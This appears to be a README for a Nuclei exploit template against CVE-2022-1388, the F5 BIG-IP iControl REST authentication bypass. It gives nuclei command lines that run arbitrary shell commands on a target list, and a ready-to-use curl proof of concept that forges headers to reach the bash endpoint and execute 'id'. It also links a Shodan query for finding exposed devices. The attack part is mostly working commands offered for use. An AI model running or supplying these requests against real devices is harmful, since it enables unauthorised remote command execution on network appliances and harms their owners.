Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

This template use token-spray / nuclei's CLI variable

This nuclei-template accepts shell parameter for exploitation. We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time

-V, -var value custom vars in var=value format

nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

POC Manual

curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Additional Details

• https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

References

• https://blog.projectdiscovery.io/nuclei-v2-5-release/
• https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
• https://github.com/alt3kx/CVE-2022-1388_PoC
• https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
• https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
• https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
• https://github.com/tenable/audit_files/tree/master/cve-2022-1388
• https://support.f5.com/csp/article/K23605346
• https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
• https://twitter.com/1ZRR4H/status/1522165718975922178
• https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml